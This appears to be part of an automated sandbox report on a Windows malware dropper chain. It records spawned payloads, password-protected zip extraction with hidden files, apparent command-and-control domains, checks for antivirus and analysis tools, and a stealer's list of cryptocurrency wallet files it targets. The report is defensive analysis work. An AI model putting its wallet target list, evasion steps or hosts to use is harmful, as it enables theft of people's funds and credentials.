                    Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                    Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                    Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 6432
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe "C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe "C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe "C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe "C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe "C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeProcess created: unknown unknown
                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4002520006.000000000099C000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: XProgram Manager
                    Source: skotes.exe, skotes.exe, 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009BD690 cpuid 20_2_009BD690
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018752001\ceb22082b1.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018752001\ceb22082b1.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018753001\0d47226567.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018754001\e6495426be.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018754001\e6495426be.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018755001\5b8d16eb23.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018755001\5b8d16eb23.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018756001\6ab9fd9cb3.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018756001\6ab9fd9cb3.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018757001\bae1ddf86f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018757001\bae1ddf86f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018758001\7962b1cc51.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018758001\7962b1cc51.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018759041\TSR9hLL.ps1 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018760001\6e10e1308f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018760001\6e10e1308f.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018761001\11dc0b2109.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018761001\11dc0b2109.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018762001\7dd90a1f78.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1018762001\7dd90a1f78.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B3CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00B3CBEA
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009BDBA0 GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress,20_2_009BDBA0
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
                    Source: ea17d0b77a.exe, 0000002F.00000003.3471828382.0000000001104000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: es%\Windows Defender\MsMpeng.exe
                    Source: ea17d0b77a.exe, 0000002F.00000003.3421003760.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421454526.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3422664576.0000000005996000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 4.2.skotes.exe.f30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.b20000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.skotes.exe.f30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2262477071.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2755017599.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.2272594198.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2221672468.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ea17d0b77a.exe PID: 3920, type: MEMORYSTR
                    Source: Yara matchFile source: 00000030.00000003.3334314821.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.4222202528.0000000000F21000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR
                    Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                    Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger 